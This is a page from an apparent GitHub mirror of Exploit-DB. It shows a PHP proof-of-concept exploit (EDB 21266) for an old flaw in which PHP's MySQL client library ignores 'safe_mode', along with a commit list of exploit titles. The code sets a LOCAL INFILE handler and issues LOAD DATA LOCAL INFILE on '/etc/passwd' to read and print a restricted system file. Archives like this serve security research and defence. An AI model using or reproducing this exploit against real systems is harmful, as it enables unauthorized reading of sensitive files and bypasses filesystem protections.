bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/remote/21266.php
Offensive Security feb7c15c11 DB: 2016-05-19 
1 new exploits

Debian OpenSSL - Predictable PRNG Bruteforce SSH Exploit (Perl)
Debian and Derivatives OpenSSL 0.9.8c-1<= 0.9.8g-9 - Predictable PRNG Bruteforce SSH Exploit (Perl)

Debian OpenSSL - Predictable PRNG Bruteforce SSH Exploit (Ruby)
Debian and Derivatives OpenSSL 0.9.8c-1<= 0.9.8g-9 - Predictable PRNG Bruteforce SSH Exploit (Ruby)

Debian OpenSSL - Predictable PRNG Bruteforce SSH Exploit (Python)
Debian and Derivatives OpenSSL 0.9.8c-1<= 0.9.8g-9 - Predictable PRNG Bruteforce SSH Exploit (Python)
PHP 4.x/5.x MySQL Safe_Mode Filesystem Circumvention Vulnerability (1)
PHP 4.x/5.x MySQL Safe_Mode Filesystem Circumvention Vulnerability (2)
PHP 4.x/5.x MySQL Safe_Mode Filesystem Circumvention Vulnerability (3)
PHP 4.x/5.x MySQL Library - 'Safe_Mode' Filesystem Circumvention Vulnerability (1)
PHP 4.x/5.x MySQL Library - 'Safe_Mode' Filesystem Circumvention Vulnerability (2)
PHP 4.x/5.x MySQL Library - 'Safe_Mode' Filesystem Circumvention Vulnerability (3)

phpliteadmin 1.1 - Multiple Vulnerabilities
phpLiteAdmin 1.1 - Multiple Vulnerabilities

PHP <= 7.0.4/5.5.33 - SNMP Format String Exploit
PHP <= 5.5.33 / <= 7.0.4  - SNMP Format String Exploit

Magento < 2.0.6 - Unauthenticated Arbitrary Unserialize -> Arbitrary Write File
2016-05-19 05:05:38 +00:00

20 lines
No EOL
918 B
PHP
Executable file
Raw Blame History

<?php
/*
source: http://www.securityfocus.com/bid/4026/info
PHP's 'safe_mode' feature may be used to restrict access to certain areas of a filesystem by PHP scripts. However, a problem has been discovered that may allow an attacker to bypass these restrictions to gain unauthorized access to areas of the filesystem that are restricted when PHP 'safe_mode' is enabled.
In particular, the MySQL client library that ships with PHP fails to properly honor 'safe_mode'. As a result, a user can issue a LOAD DATA statement to read files that reside in restricted areas of the filesystem (as determined by 'safe_mode').
*/
function r($fp, &$buf, $len, &$err) {
print fread($fp, $len);
}
$m = new mysqli('localhost', 'aaaa', '', 'a');
$m->options(MYSQLI_OPT_LOCAL_INFILE, 1);
$m->set_local_infile_handler("r");
$m->query("LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE a.a");
$m->close();
?>
Reference in a new issue View git blame Copy permalink